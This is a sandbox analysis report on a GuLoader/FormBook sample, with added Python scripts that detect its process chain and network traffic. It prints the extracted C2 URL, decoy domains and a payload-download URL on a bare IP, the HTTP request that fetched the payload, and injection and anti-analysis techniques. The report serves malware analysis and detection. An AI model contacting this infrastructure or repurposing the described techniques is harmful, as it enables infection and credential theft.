
Analysis Report POLITICALLY.exe

Overview

General Information

Sample Name: POLITICALLY.exe
Analysis ID: 411376
MD5: 80b3365808440838596864bd6d492c02
SHA1: ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256: 8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
Tags: exe

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • POLITICALLY.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)
    • POLITICALLY.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6028 cmdline: /c del 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
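The tree above is the lineage as the sandbox reconstructs it, injection included: explorer.exe (PID 3440) was not created by the second POLITICALLY.exe, it was injected by it, and control.exe was then spawned from the injected explorer.exe. Endpoint telemetry only sees process-creation events, so the same chain appears as the dropper launching a second copy of its own image, then control.exe with an apparently benign explorer.exe parent, then cmd.exe deleting the original file. The Python below is an added example, not part of the Joe Sandbox report: it applies three checks to a constructed set of Sysmon-style creation events that mirror the PIDs and command lines of the tree. The field names, the pre-existing explorer.exe record and the dropper's parent PID are assumptions.

```python
"""Detect the execution chain from the Startup tree above using only
process-creation events. Added example, not part of the Joe Sandbox report."""
import re

# Constructed Sysmon-style events mirroring the tree. explorer.exe (3440) is the
# already-running shell; the report shows it as the injection target, not as a
# child of POLITICALLY.exe. Field names and the dropper's parent are assumptions.
EVENTS = [
    {"pid": 3440, "ppid": 0, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 7124, "ppid": 3440, "image": r"C:\Users\user\Desktop\POLITICALLY.exe",
     "cmdline": r"'C:\Users\user\Desktop\POLITICALLY.exe'"},
    {"pid": 6976, "ppid": 7124, "image": r"C:\Users\user\Desktop\POLITICALLY.exe",
     "cmdline": r"'C:\Users\user\Desktop\POLITICALLY.exe'"},
    {"pid": 5548, "ppid": 3440, "image": r"C:\Windows\SysWOW64\control.exe",
     "cmdline": r"C:\Windows\SysWOW64\control.exe"},
    {"pid": 6028, "ppid": 5548, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\POLITICALLY.exe'"},
    {"pid": 6776, "ppid": 6028, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "del <path>" with the path optionally wrapped in single or double quotes
DEL_TARGET = re.compile(r"""\bdel\b\s+['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)

# Windows binaries that have no legitimate reason to launch a command shell;
# control.exe is the one this report shows, extend the set for your estate
NO_SHELL_PARENTS = {"control.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule, pid, note) findings for three behaviours seen in the tree:
    a process re-launching its own image (hollowing candidate), a shell spawned
    by a parent from NO_SHELL_PARENTS, and cmd.exe deleting the image of a
    process that appears in the same event set (dropper self-delete)."""
    by_pid = {e["pid"]: e for e in events}
    known_images = {e["image"].lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        img = basename(e["image"])
        if parent and parent["image"].lower() == e["image"].lower():
            findings.append(("self_spawn_same_image", e["pid"],
                             f"{img} launched a second copy of itself from PID {parent['pid']}"))
        if img == "cmd.exe" and parent and basename(parent["image"]) in NO_SHELL_PARENTS:
            findings.append(("shell_from_unexpected_parent", e["pid"],
                             f"{basename(parent['image'])} (PID {parent['pid']}) spawned cmd.exe"))
        m = DEL_TARGET.search(e["cmdline"]) if img == "cmd.exe" else None
        if m and m.group(1).lower() in known_images:
            findings.append(("self_delete_of_known_image", e["pid"],
                             f"cmd.exe deletes {m.group(1)}, the image of a process in this chain"))
    return findings


if __name__ == "__main__":
    for rule, pid, note in evaluate(EVENTS):
        print(f"[{rule}] PID {pid}: {note}")
```

The self-spawn check is the weakest of the three on its own (installers and browsers do it too), which is why it is paired with the shell-from-control.exe and self-delete checks; all three fire on this sample's chain.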

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}

Threatname: GuLoader

{"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
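The two extracted configurations above are enough to hunt for this sample's traffic in proxy logs. The Python below is an added example and not part of the Joe Sandbox report: it turns the FormBook and GuLoader configuration into match rules and runs them over a few constructed proxy-log lines. It assumes a whitespace-separated log layout (timestamp, client, method, URL, quoted User-Agent) that the report does not define, and it cuts the decoy list to three entries for brevity. Two observations from the report drive the logic: the GuLoader stage is fetched from a bare IP with a .bin path (the ET 2018752 alert), and FormBook contacts the decoys as www.<decoy> with the same /olg8/ path as the real C2 (see the strings recovered from explorer.exe below). The caveat for blocking: the decoy domains are otherwise ordinary sites, so match on host plus path rather than on host alone.

```python
"""Hunt for this sample's network activity in proxy logs, driven by the
FormBook and GuLoader configuration extracted above.
Added example, not part of the Joe Sandbox report."""
import json
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Values copied from the report. The decoy list is cut to three entries here;
# feed the full extracted JSON in practice.
FORMBOOK_CONFIG = json.loads(
    '{"C2 list": ["www.nortier.cloud/olg8/"], '
    '"decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com"]}'
)
GULOADER_CONFIG = {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}

# Assumed log layout (not from the report): timestamp client method url "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample lines; the first three reproduce behaviour the report shows,
# the last two are benign look-alikes that must not fire.
SAMPLE_LOG = """\
2021-05-01T10:00:01Z 192.168.2.6 GET http://111.90.149.46/bin_XNLhDlJvG218.bin "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-05-01T10:00:09Z 192.168.2.6 GET http://www.wiseowldigital.com/olg8/ "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-05-01T10:00:12Z 192.168.2.6 POST http://www.nortier.cloud/olg8/ "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-05-01T10:01:00Z 192.168.2.7 GET http://www.wiseowldigital.com/about "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/88.0"
2021-05-01T10:02:00Z 192.168.2.7 GET http://example.com/files/update.bin "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/88.0"
"""


def is_dotted_quad(host):
    """True when the host part of a URL is a literal IPv4 address."""
    try:
        return ip_address(host).version == 4
    except ValueError:
        return False


def formbook_beacon_patterns(cfg):
    """Map (host, path) -> label for every endpoint FormBook will beacon to.
    The report shows the decoys contacted as www.<decoy> with the C2's path."""
    c2_host, _, c2_path = cfg["C2 list"][0].partition("/")
    path = "/" + c2_path
    targets = {(c2_host, path): "formbook_c2"}
    for decoy in cfg["decoy"]:
        targets[("www." + decoy, path)] = "formbook_decoy"
    return targets


def classify_request(method, url, fb_targets, gl_cfg):
    """Return (kind, detail) for one request, or (None, None) if it is clean."""
    parts = urlsplit(url)
    host, path = parts.hostname or "", parts.path or "/"
    if url == gl_cfg["Payload URL"]:
        return "guloader_payload", "exact match on extracted payload URL"
    if is_dotted_quad(host) and path.lower().endswith(".bin"):
        # Same idea as the ET 2018752 Snort alert: a .bin fetched from a bare IP
        return "guloader_payload", "generic .bin download from dotted quad"
    kind = fb_targets.get((host, path))
    if kind:
        return kind, f"{method} to FormBook beacon path {path} on {host}"
    return None, None


def scan_proxy_log(text, fb_cfg=FORMBOOK_CONFIG, gl_cfg=GULOADER_CONFIG):
    """Run the classifier over every parseable line; return the hits in order."""
    targets = formbook_beacon_patterns(fb_cfg)
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, client, method, url, _ua = m.groups()
        kind, detail = classify_request(method, url, targets, gl_cfg)
        if kind:
            hits.append({"line": n, "ts": ts, "client": client,
                         "kind": kind, "url": url, "detail": detail})
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(f"line {h['line']:>3} {h['client']:<13} {h['kind']:<17} {h['url']}  ({h['detail']})")
```

A formbook_decoy hit from a host is as good an infection indicator as a formbook_c2 hit: the bot rotates through the whole list, so the first beacon you see is usually to a decoy, and the real C2 may never appear in a short capture.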

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
[10 further memory-dump entries not included in this export]

        Sigma Overview

        No Sigma rule has matched

Signature Overview

        AV Detection:

Found malware configuration
Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.nortier.cloud/olg8/"], "decoy": [the 64 decoy domains listed under Malware Configuration above]}
Multi AV Scanner detection for submitted file
Source: POLITICALLY.exe | Virustotal: Detection: 17%
Source: POLITICALLY.exe | ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 23.2.control.exe.4fb518.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 23.2.control.exe.4d37960.4.unpack | Avira: Label: TR/Dropper.Gen
Uses 32bit PE files
Source: POLITICALLY.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source: Binary string: control.pdb | source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: POLITICALLY.exe, control.exe
Source: Binary string: control.pdbUGP | source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi

        Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49744 -> 111.90.149.46:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.nortier.cloud/olg8/
Source: Malware configuration extractor | URLs: http://111.90.149.46/bin_XNLhDlJvG218.bin
Source: Joe Sandbox View | ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: global traffic | HTTP traffic detected:
  GET /bin_XNLhDlJvG218.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: 111.90.149.46
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 111.90.149.46 (reported 50 times; the payload host is addressed by literal IP, so no DNS lookup precedes these connections)
Source: global traffic | HTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1 (same request and headers as above)
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp | String found in binary or memory (trailing characters after .bin are adjacent memory bytes picked up by the string carver, not part of the URL):
  • http://111.90.149.46/bin_XNLhDlJvG218.bin
  • http://111.90.149.46/bin_XNLhDlJvG218.bin/
  • http://111.90.149.46/bin_XNLhDlJvG218.bin3
  • http://111.90.149.46/bin_XNLhDlJvG218.binb)
  • http://111.90.149.46/bin_XNLhDlJvG218.binw
  • http://111.90.149.46/in_XNLhDlJvG218.bin
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory (typeface-vendor URLs of the kind carried in font files mapped into explorer.exe; not attacker infrastructure):
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-jones.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp | String found in binary or memory:
  • http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp | String found in binary or memory (FormBook C2 and decoy URLs from the injected explorer.exe; the chained form www.A/olg8/www.B is the string carver running two adjacent beacon strings together, and the Referer: fragments are the bot's prepared request headers):
  • http://www.6923599.com
  • http://www.6923599.com/olg8/
  • http://www.6923599.com/olg8/www.wiseowldigital.com
  • http://www.6923599.comReferer:
  • http://www.artboxxstudio.com
  • http://www.artboxxstudio.com/olg8/
  • http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com
  • http://www.artboxxstudio.comReferer:
  • http://www.assroyalty.club
  • http://www.assroyalty.club/olg8/
  • http://www.assroyalty.club/olg8/www.tuancai.net
  • http://www.assroyalty.clubReferer:
  • http://www.auroraleathers.com
  • http://www.auroraleathers.com/olg8/
  • http://www.auroraleathers.com/olg8/www.artboxxstudio.com
  • http://www.auroraleathers.comReferer:
  • http://www.cunerier.com
  • http://www.cunerier.com/olg8/
  • http://www.cunerier.com/olg8/www.purplebean.company
  • http://www.cunerier.comReferer:
  • http://www.easiersell.com
  • http://www.easiersell.com/olg8/
  • http://www.easiersell.com/olg8/www.assroyalty.club
  • http://www.easiersell.comReferer:
  • http://www.moopyo.com
  • http://www.moopyo.com/olg8/
  • http://www.moopyo.com/olg8/www.morgolf.com
  • http://www.moopyo.comReferer:
  • http://www.morgolf.com
  • http://www.morgolf.com/olg8/
  • http://www.morgolf.com/olg8/www.easiersell.com
  • http://www.morgolf.comReferer:
  • http://www.nortier.cloud
  • http://www.nortier.cloud/olg8/
  • http://www.nortier.cloudReferer:
  • http://www.onlinewomensclasses.com
  • http://www.onlinewomensclasses.com/olg8/
  • http://www.onlinewomensclasses.com/olg8/www.policomercial.com
  • http://www.onlinewomensclasses.comReferer:
  • http://www.policomercial.com
  • http://www.policomercial.com/olg8/
  • http://www.policomercial.com/olg8/www.6923599.com
  • http://www.policomercial.comReferer:
  • http://www.prismatiq.tech
  • http://www.prismatiq.tech/olg8/
  • http://www.prismatiq.tech/olg8/www.soakstress.xyz
  • http://www.prismatiq.techReferer:
  • http://www.purplebean.company
  • http://www.purplebean.company/olg8/
  • http://www.purplebean.company/olg8/www.nortier.cloud
  • http://www.purplebean.companyReferer:
  • http://www.soakstress.xyz
  • http://www.soakstress.xyz/olg8/
  • http://www.soakstress.xyz/olg8/www.moopyo.com
  • http://www.soakstress.xyzReferer:
  • http://www.tuancai.net
  • http://www.tuancai.net/olg8/
  • http://www.tuancai.net/olg8/www.auroraleathers.com
  • http://www.tuancai.netReferer:
  • http://www.wiseowldigital.com
  • http://www.wiseowldigital.com/olg8/
  • http://www.wiseowldigital.com/olg8/www.cunerier.com
  • http://www.wiseowldigital.comReferer:

        E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Potential malicious icon found
        Source: initial sample, Icon embedded in PE file: bad icon match: 20047c7c70f0e004
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222E459 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222EB73 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221AE71 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DC36 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F270 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221E245 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B24A NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221E378 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B3D0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F3D4 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B121 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F658 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B698 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F768 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B7FC NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B514 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F519 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221BA7C NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DB19 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_02212B60 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221BBB2 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222EB8C NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222F896 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221B932 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221BE0D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221AE76 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221CEAB NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222EF21 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221BF4D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221AFD8 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DFD8 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221BCDC NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0222EDB9 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DD81 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2795D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk,
